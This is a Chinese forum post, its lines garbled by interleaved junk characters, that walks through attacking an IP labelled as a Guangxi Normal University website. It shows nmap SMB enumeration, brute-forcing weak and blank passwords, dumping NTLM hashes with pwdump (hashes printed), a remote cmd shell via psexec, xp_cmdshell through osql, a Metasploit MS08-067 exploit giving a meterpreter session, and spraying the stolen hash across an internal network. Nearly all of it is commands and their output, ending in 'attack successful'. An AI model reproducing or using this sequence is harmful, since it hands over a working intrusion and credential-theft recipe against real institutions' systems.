广西师范网站http://202.103.242.241/ s8 b) X$ z" J
# i# Z: f- C7 }+ w5 b3 F# M x
root@bt:~# nmap -sS -sV 202.103.242.241
$ Q8 t2 W: [" g6 W9 g' c
" p7 m1 e$ l, y! L( F$ PStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST% \( {6 {* z8 O' J' q% D
7 Z3 y+ z9 C$ c4 s$ l* }0 F
Nmap scan report for bogon (202.103.242.241)1 ], ~ A2 { W( R" l- ]& I
" @, x( e0 h. m2 R. p$ u$ uHost is up (0.00048s latency).
* J7 U8 I2 a: _. l" l% `: s$ i3 x) a$ u* u' K: x% G
Not shown: 993 closed ports
! c3 m s8 |3 ]! e0 p, n% w/ g0 `( x; m( H* T7 h
PORT STATE SERVICE VERSION
2 ^% A! z& x, l3 H1 d$ c& L; A) G% _/ G4 t
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) g) P0 R3 ~/ M7 }2 W7 z! z4 w
7 Q' y7 W; b$ ?0 B' Q, b" k139/tcp open netbios-ssn
& L# _9 c+ L- {4 c% ]2 {2 J ^7 h8 s; Z: {, \: o/ r/ h- v
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds5 y6 f: R/ N5 r3 {, S1 z4 H6 R' y
# h; L1 {, T7 ?4 X- w; i( Q1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)3 Q0 h- E, w; m* D1 S
5 _5 _, y: w8 |2 e" `
1026/tcp open msrpc Microsoft Windows RPC/ R$ \: J W/ f' @4 [
" E( f- E4 Z( z
3372/tcp open msdtc?
2 W J" s" K* S' c! s& u
Z. `9 o0 f. ]( Y& v3389/tcp open ms-term-serv?( o& M# ]4 U& a
! o5 r# g b6 \/ n* P- b& F" |' j1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
% g. L" }) f Z9 n! y e/ d Q2 x6 @SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r7 K% y/ x$ |1 U) p# k/ o
, r9 p) B; y1 E: w7 W+ t
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
8 u/ \5 d2 R+ `. ~% |, @4 g9 X( j" V! U$ l$ R' _
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)9 |) Z. z6 B) I. ~( `7 @
z* f4 P- _$ u% g
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
/ v) b: o8 f# v: a' ?# i1 K) E% B6 y' [ o! W4 ^* r' s0 N. ~
SF:ptions,6,”hO\n\x000Z”);4 S# B( \& Z6 g: [" `1 N
( e; c7 ~9 |: p: ?* s- X9 y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)- a- K% A% g3 B1 ^
- J! o6 f/ G9 B" L8 U K+ z% K3 BService Info: OS: Windows
7 T2 d3 ^$ W! E4 l& H
' M& P5 P1 }0 m# K2 d- H/ \: L* [Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .+ \. V; O& g2 ]) U- w
- i, r6 q! z) ~+ D2 G0 F- A
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
- y3 l6 f0 i; q' e; G0 G( f' r
" k7 g1 { J. a" H( C# droot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本2 v5 p4 ?% `; A; f" \
9 Q/ D9 n% s3 H) C9 R6 B k T-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse" J j3 }4 {! r; s- V# x) g
4 _# I( l, K6 C; \7 x-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
: d6 R. Q5 F+ R% C! C7 K* R) y) n0 Q! L9 j, B0 P5 [
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
T7 X1 U! z; ]5 z) }6 ]
0 n$ W8 }0 K- `! C- |1 B/ C8 m0 [0 t-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
* }$ l. l9 {; E* u0 n( H$ C1 |9 q( T% ^2 B( _
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
: c3 i! u7 h9 g
. b& C \: l$ } b& X-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
! t3 L1 N+ |0 b. _1 s
" j" i {% G; Y# H( v4 Z9 S/ P-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse$ W% t0 {3 V# g) d$ B; g8 i
* E/ m* U8 W* l-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
9 A6 S3 f2 o4 q6 N* J6 s' N8 P8 k4 b
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse5 I V3 s) o+ ^9 q C2 i
) q" H2 y* ^2 N+ s' D
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse2 T1 v$ T1 V$ f3 e7 {' X
5 Q Z, Q, Z2 p! U; ^2 E- L
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse7 b5 F" V$ k8 @* W2 z: S! G
! v/ b0 w6 p4 O( {' P& e. Z( P
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse2 _+ ?0 ?; S! b, l4 q; C
! B6 l. D+ L& X3 O6 {3 O-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse) P5 @7 Q# r0 V3 |2 F* \
, [: `. s: A( s8 `. _: z3 C. ~-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
6 O( f9 m! l: Q! f
7 | I. ~6 _+ U, Q: @-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse3 B/ z. a l E6 P% T
1 D& c, n( q- u5 I2 Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
6 K6 V7 c7 Y1 Q% g# d! N
/ r0 J8 a8 B" F; J/ e//此乃使用脚本扫描远程机器所存在的账户名
2 f" z. }5 N6 n1 h8 k9 o- ^% l$ S& @3 P
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
# H3 M- `1 s; h6 E, j) F6 g4 F |/ ]* t) k# ?/ L5 c$ J4 k- e
Nmap scan report for bogon (202.103.242.241)
, K1 Y" Q# Y) r0 O2 @* R$ o
" y" F5 L; @3 m7 f- R& RHost is up (0.00038s latency).
& U/ @ l) w. X& Z- {3 k
8 N2 l; ~2 b8 b- n: c& XNot shown: 993 closed ports
* L3 E- I! U# Y( B+ D, x( p/ Z5 l9 u2 R* P1 Q
PORT STATE SERVICE4 w0 e: k" f- h8 ~
! m) n Q8 M7 Y) G3 c h
135/tcp open msrpc4 B% A" A& [# f2 |, m
$ T% {4 c1 b7 j& u139/tcp open netbios-ssn! G, g! e9 B6 O! o2 y: M( [
0 ?% H. R2 r4 Q6 X
445/tcp open microsoft-ds
- t( P' X- `+ {" z% O) U! \/ u; i# |" N4 t; K
1025/tcp open NFS-or-IIS
! _$ Z7 h7 j4 j
. @/ n6 _! p; \* F4 @% M4 [0 m. J1026/tcp open LSA-or-nterm
$ t# N6 b: Y& b
* C& R( I- m+ J: o' x3 K/ R9 U5 D3372/tcp open msdtc
; A2 C9 ?/ u3 ?) ?) W9 M8 F0 _6 V0 I& ]' o! w' Q+ ]7 L M- q- c
3389/tcp open ms-term-serv7 x0 v; @: O4 Y7 i5 }1 e J" Y/ Z
, e7 L2 a3 S6 I6 z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- H0 }8 y$ ]7 ^; h$ P
% ~! E8 L8 y ]3 P j; V* X
Host script results:
# z6 ^/ Y: s: I9 S* d9 W4 i6 v. b$ Q4 I6 _
| smb-enum-users:
& N+ s- n9 v: V9 A/ [9 D9 H1 R/ u- x! r5 L+ W- g0 b- O5 i
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果) d, v A" s" H7 k
; Q8 F8 s- O5 i. }8 }1 A1 B; c! ANmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: m F; n3 [8 p& N" f3 W& x6 }" d& I0 ~/ ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
, `) N/ f( N5 u4 K; h" v. F. y, t5 E: V* E3 e. x
//查看共享
; O6 O0 y3 ]3 E& E( T
. J+ Q# l3 c2 C' n# c( ~# _+ RStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST6 K. \% }7 }* j, Z) J5 P) c
/ @ w8 W" }! X, c# Q
Nmap scan report for bogon (202.103.242.241)
% m- J4 l% F, r; n
- D; ?& B8 Z1 N. xHost is up (0.00035s latency).6 \0 Z( ^: A7 g" j! U
/ s- y* n( n2 E& w: H4 S3 a
Not shown: 993 closed ports3 \) L$ d7 c- d- G! F5 Q# X/ ~, m7 l
. V6 u" M# Z6 D5 tPORT STATE SERVICE( n$ w; I C- z: b; A
0 w, }) u: q. k5 k% m135/tcp open msrpc
6 B3 s2 Y; J3 Q1 E# t! H
. [ E( D6 o# y+ g139/tcp open netbios-ssn
, b. L0 H2 E5 I$ Q+ {
2 f: S$ |6 @7 I1 K; q6 w1 z445/tcp open microsoft-ds
4 D: K3 b5 F) F( n0 J4 }4 D
$ d, y1 L' O- }+ U1025/tcp open NFS-or-IIS
7 \& ?4 b, C- l$ S' M6 F. r5 o4 k, } D0 I- x: M) U
1026/tcp open LSA-or-nterm
! n' w. c, d2 w2 p6 ~8 h: v `3 q) e4 L5 M/ W3 j( g- d5 w
3372/tcp open msdtc, A, |" P8 T1 [1 Y
7 p; x) m- K8 B V7 v w' `3389/tcp open ms-term-serv
+ b* H+ ^* ?( h; M. F, \4 N) [6 {* d" ^" {
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# {9 `- `1 ]) _; c+ O
& {, i1 ?( g7 q7 i5 r; cHost script results:
: X/ o' \0 X6 ^: Q7 H' ]( r
9 v( c m( I1 m: h- p" U6 p9 [3 M| smb-enum-shares:
1 J: r+ B4 F6 Z2 i7 k" t# f& i( X3 w9 _! R7 A8 j
| ADMIN$0 ~; [4 R% h% R
9 f: f3 b- x% V+ e& A4 R k
| Anonymous access: <none>7 [% V+ Z; G3 z7 A
+ c0 Q% B* `; a% J' F
| C$
) m5 C9 p9 q- ]+ T
" f# M7 b, s& v) W& V| Anonymous access: <none>6 X. E" h1 S2 P& s
$ Y% y+ B0 A- y* `" c7 O9 o, }| IPC$9 t9 U! E4 l! }5 \
6 K$ E5 y) N+ V) N7 z7 c! H% W- S9 e|_ Anonymous access: READ
+ O8 X6 [7 c, I I
9 t8 [6 v7 E. J1 H2 \Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
( E3 i5 ^6 q. h5 I1 z( F# y* I! j) _% x8 T* `# L& [
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
7 N# ^/ n; _4 Y' x; Y( g" z4 a8 C5 G
//获取用户密码
/ H- X! h" k9 q4 R6 a) h. M% X( d4 O/ a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) Y6 y. S/ y4 K
2 C* T) p9 O: x! P8 c0 WNmap scan report for bogon (202.103.242.2418)
/ W- a4 m" K5 x: Q( z5 Z
# o5 `, h% K4 ~" xHost is up (0.00041s latency).
$ w" V& \6 K* h- }9 `$ ~: {+ I; N; V: z- S- k. s# P
Not shown: 993 closed ports9 w+ Y2 s7 E8 s; `7 }
: X; H( [# ~3 @+ `6 M5 LPORT STATE SERVICE/ }7 J, ?* {: V* o: N
' M# T3 W$ O/ C( E7 t# b& {# k! P; B135/tcp open msrpc: c, ? M( i7 p
$ r2 y) G9 \0 X$ H9 v, K
139/tcp open netbios-ssn) V1 a3 ^$ {8 X- q0 P
" g- k' X" \' q5 a) u2 c9 D0 `/ ]445/tcp open microsoft-ds
$ a4 k6 G6 `& u; [8 C: |' X' c! e4 Q2 z& S \1 b- [4 A7 _
1025/tcp open NFS-or-IIS
* [# A* V8 U: p6 p7 n, f' F7 {* W
0 [- c/ v% n5 o9 c5 p1026/tcp open LSA-or-nterm/ ^' H4 M/ t. O; m
+ \1 _5 w; L2 e( F5 e- X. B
3372/tcp open msdtc
+ N. i/ c O: y8 I7 P% s$ a9 H0 [) e) a, n& D1 a* U$ v& _- Z
3389/tcp open ms-term-serv9 f+ _1 S3 M. {5 {& j
7 N! @% M E8 z/ o' p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ L% D; _# h! M, P( e7 A# _* ^! A7 y( e, U& H0 i0 @# Z
Host script results:
" n. r' z, l. C* `' Z9 r
8 q! t7 b& Q+ W/ B0 H| smb-brute:5 A$ o5 A W! [0 u
* ~/ b+ _" j+ Z: e# R: Qadministrator:<blank> => Login was successful
, o* {0 r- L, p! ~6 X( i X0 c
7 ]* b8 R0 a$ N! z* a* t( ]% i% E/ j|_ test:123456 => Login was successful; N# \" z% D U
9 w! l& ~0 l* v2 p7 Q$ U% A
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds+ Q9 Q& Y# ~* R0 H0 t
* }/ k9 @" f2 B- U) s _root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
$ @8 U7 f" n$ i) _8 j! t" ]
9 ~; Y2 E8 ], N' X! W* v [, eroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data# `: }* ^. h1 l. E
" ]" {9 p! J5 n! Z7 V
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse, {! v0 k# Z0 \" j* @
0 a0 h, `) E+ B4 D) {' Q: n
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139& Z" k9 N0 g' ~* D% _. q/ I
. s: b& [6 G! C6 j& S4 f
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST8 `1 d! h6 @& d3 }9 c7 Z
5 R' S) V6 ?# N7 `
Nmap scan report for bogon (202.103.242.241)
; U/ H/ C+ R5 G' e o$ V ], U
* q, V! b) a& B) |8 t& YHost is up (0.0012s latency).
' |. P9 }: z( o/ u- G
, _# _' {# T% U2 `$ L k( }PORT STATE SERVICE
( W- ?2 e8 ~1 J' w/ }5 V" p' E
H% M# m* R9 ]2 L1 e2 K$ w135/tcp open msrpc
# q; u+ `6 S7 Q K- ?) {! C& b
F' h4 S" ~* l139/tcp open netbios-ssn4 o" l( W8 r6 s+ \% v
& {8 H# q* ^. b0 g, l+ K+ F/ ^$ T
445/tcp open microsoft-ds) ]* U8 F0 r" G6 w! R
& w& u7 h: Z3 W; W: o4 ^
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); I+ y& ]4 E) u7 u8 Z- B3 [
$ A" X& v6 `+ z8 r
Host script results:! M% x9 B* G6 w$ V$ Z0 B% i
) d9 E7 `. g* }0 h' W
| smb-pwdump:! {6 y+ {" E8 @+ q8 D
- N# ? ]6 q' C0 [0 {
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************7 [; P7 `* \; a* E I7 F6 y
, Q7 c/ J M& ]8 p1 a4 l/ P| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 ?' }3 y! S' c- q
8 X- _/ m1 }* U8 g/ g% X8 t# v& I| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4( x8 J% n& x- y" O" y4 s( g7 u4 d' C
$ a9 q2 j" m( v, A# G|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2: j8 D7 h0 @* @0 `) x( J
3 b. u0 V3 _8 U Z% o( u
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds# A6 _' R$ P5 X0 S3 w& `. ^
/ o: z1 t4 H# F) ^; }0 w; wC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell" O/ B2 B) p7 o3 C% z! W
+ H7 g% ^6 {9 @) I( I-p 123456 -e cmd.exe- S& f7 i- O" y, z
* @# N5 p/ K7 [" k2 I0 z
PsExec v1.55 – Execute processes remotely
3 I) n9 z! M; _5 g7 r
* g& S: a' ?! @Copyright (C) 2001-2004 Mark Russinovich1 S$ @* I- `% z7 F3 O+ x0 k/ V% c
- U! E* v4 d4 p) e9 S4 a& A8 @
Sysinternals – www.sysinternals.com4 o' {0 k2 i- w F" U4 L& B
' z% f0 D* }( h! r, d6 ?$ @+ pMicrosoft Windows 2000 [Version 5.00.2195]. `' \# Y8 N" _( x
$ y F- o" ~+ j' B1 a, k
(C) 版权所有 1985-2000 Microsoft Corp.6 }) r1 l T1 C& _
1 x! `" A$ j0 Q
C:\WINNT\system32>ipconfig! r1 U; ? y7 R7 T
$ y& m5 e( c' z
Windows 2000 IP Configuration
& W6 ?& x D q* T e' H
2 U* \3 K. x" [' ?1 xEthernet adapter 本地连接:7 h* Y! b3 |: O& F9 Q
) V; X+ ?, \% Z6 k zConnection-specific DNS Suffix . :
1 G" Z G& C" \/ |+ s( ^! \( c. Z9 f0 o- d, N8 l2 W+ Z- a+ z O
IP Address. . . . . . . . . . . . : 202.103.242.241
! d B: l. C/ c- j: V5 T/ t+ t& G$ b. Y; l- o
Subnet Mask . . . . . . . . . . . : 255.255.255.01 ~' s" w! V5 B1 Y7 o# b0 b
. t. W* I j r" EDefault Gateway . . . . . . . . . : 202.103.1.1; S: R z9 ?" h+ h3 o3 L$ Y
- T* @8 ?! L6 r$ ?; ]C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
9 G# Z, I, d1 u: k; _' W, @( |% {
# b" P& g! K6 a- U" i1 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞8 B9 e0 |3 [, ~3 m6 Q( Y5 J' H
1 J2 o/ W A$ b! G! F1 L
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST! d7 `' }$ ~: z' M; G$ M; I
9 \' x; H- @- R' R0 A+ h
Nmap scan report for bogon (202.103.242.241)3 J. v& U! C& G, P
8 m! u/ F c, q/ V; U
Host is up (0.00046s latency).5 d, U* _- a/ ~9 w* U" T5 ^
2 ?) L' c' U9 z( i) f" w
Not shown: 993 closed ports
7 x9 N1 s- \" O9 x1 T9 k2 n6 X% u) K8 n' x9 T3 N! M" U
PORT STATE SERVICE; ?1 a p/ Y9 A& E
5 [0 V3 w0 m1 K! ?' h- ^
135/tcp open msrpc
+ C$ m* q% M5 k% ?+ r* ?$ Q5 d+ V' d( o
139/tcp open netbios-ssn
0 L4 M( }/ Z2 k
" A# E! G& J, P4 c) `4 z [445/tcp open microsoft-ds* K9 d, I( o0 Q0 {4 E' X
: I% y0 W9 v" o
1025/tcp open NFS-or-IIS
$ L2 M5 j6 T7 u1 J# Q5 T B* I
, I( K+ Z+ w- d1026/tcp open LSA-or-nterm: P8 \( u& Q* X* e
- Y1 Q% L( W8 n+ z1 I" e6 {
3372/tcp open msdtc
3 S8 G2 s4 z4 M
& K4 T R; C! L1 j* ]7 z3389/tcp open ms-term-serv8 K# k6 I9 a# u3 V, {2 |1 ^
3 ?7 h# t9 V% J0 ~% Q3 O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 ^9 a- u6 U! d8 s& d; a4 h4 }7 X8 G& o" v) [
Host script results:
3 e9 B' _/ P# [
. M+ _) p x7 O2 _5 n| smb-check-vulns:
! F Z+ ]4 e* e* t% v7 O- v5 J0 J" S' C8 r- U
|_ MS08-067: VULNERABLE: {- P( |" g8 C! x' _- y1 x
2 h# H+ p% l/ FNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
' p' g3 b9 C" o
# ?7 U/ l, o' |3 d5 c& droot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出$ g. \8 _- H G; `6 H
* {# g& C7 {' x
msf > search ms08
# ?; S- W. ]+ w8 G
/ x+ s" ]" f$ c$ i i( Kmsf > use exploit/windows/smb/ms08_067_netapi4 J4 ]: m! _7 ?( O
- W1 o2 |* H( ]1 m9 p5 Ymsf exploit(ms08_067_netapi) > show options3 H& [( m6 Y+ c% }: |$ J
5 J9 e: o. u, d: L; f! v* G6 ~msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
3 E7 O7 D6 f" e$ p! N' @; }7 V% u6 U& _- G- M, x3 ^" ~ E
msf exploit(ms08_067_netapi) > show payloads
& Z* g/ N* h* B6 y
, v: |- V) b. G1 ? ?* L5 cmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp) I+ `$ d& z0 K- }$ O: Y
- B* o3 L) v( e K3 u' ]. Ymsf exploit(ms08_067_netapi) > exploit
, K1 N2 D$ v8 `: z- N- a; q0 ?" A9 u$ a1 t
meterpreter >
9 [* C, s, r3 r* t1 c, o; e( j
7 {2 ^, X8 m% y& g: a$ M. k* PBackground session 2? [y/N] (ctrl+z). M' z, l. c) {3 L1 p) s
5 F5 s3 A0 A/ {msf exploit(ms08_067_netapi) > sessions -l
' Q$ H3 ]% v9 @4 x8 ^$ C# U0 ?: ]( g& j6 m8 c. k# m$ R; N
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt# Z- M4 {' Z" S
, v, }, U2 |# j7 W0 n+ D, A: P4 ztest
L1 f: ^2 ?6 p: s
! k5 i4 W- h$ y( i3 M, [4 O- Q9 |administrator
* N& b) B+ Y6 Z; Z# U8 k4 l
9 `: K! K. |& u- ^' s3 p/ g0 K: a7 Nroot@bt:/usr/local/share/nmap/scripts# vim password.txt
- H9 T2 D3 N/ G- m( c; w% H
7 Y! D' y' R. u# E1 N" n* x! A( c44EFCE164AB921CAAAD3B435B51404EE
/ p1 k& U, w' }9 i; ^+ W. \) W% \# _, j9 k
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ' _/ D7 G$ \- n: P* W
& |) J5 X' N% M, D //利用用户名跟获取的hash尝试对整段内网进行登录
' |! J d+ `1 o# q0 y# j8 `2 p0 a0 |! q3 P5 ]
Nmap scan report for 192.168.1.105
2 }! y3 P8 m0 f8 d1 L% h( ?9 O9 s: e9 Q/ K
Host is up (0.00088s latency).
! N2 ]9 z( m4 v4 g3 r) i# K; C7 H; w5 ^9 k8 Q: n" A/ l# G3 I
Not shown: 993 closed ports
& w8 Z4 F9 E! f0 G: g+ |6 T( \6 k+ h8 s' D) j8 S l
PORT STATE SERVICE
+ G$ W4 |0 k% K. |- H+ G `; x- O5 O! k. O! T/ S
135/tcp open msrpc; T+ Z* \( b [1 R6 V
( y+ w% k8 U, r* }139/tcp open netbios-ssn( R/ d3 H( t) w6 i4 x5 i" h7 E
( H2 @+ ^ j( }. e% S445/tcp open microsoft-ds
0 \# B9 F$ U9 b+ P# D9 s, x& g! k0 \( K' K2 P5 b* b
1025/tcp open NFS-or-IIS* c% J& n' n$ T! k( G' w$ B, E
$ I: g( d1 |( d' C1026/tcp open LSA-or-nterm1 D3 C' N& H6 e. K1 z
) T7 R8 G ^/ O1 g( v3372/tcp open msdtc
5 o+ F5 W- ]1 J7 Z$ C( E& [
3 _* M% T; v2 Y3 j7 P2 R3 k! l3389/tcp open ms-term-serv9 O/ \4 `/ ]% [5 j4 f0 f
. ?- c I% @+ ~% k0 H9 g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 E: l5 Z7 ?; u& l1 N
. q& o( B1 ~+ l( f6 DHost script results:# x9 D9 Z7 D/ q( V1 |, P- m4 S
$ k# s7 i0 x9 K, b8 f% \9 `, g
| smb-brute:
) V$ l2 c: V7 F1 m, E" _4 C n
1 k& W8 P$ a$ y# S. U+ D5 {5 ||_ administrator:<blank> => Login was successful. P5 q1 R! |; c/ |) i6 w
- D. h' L8 C2 h; P攻击成功,一个简单的msf+nmap攻击~~·
9 e9 F% _; u5 Q9 j; k: f! N
. O E3 ^* R- D |
发表于 2012-12-4 12:46:42
收藏
支持
反对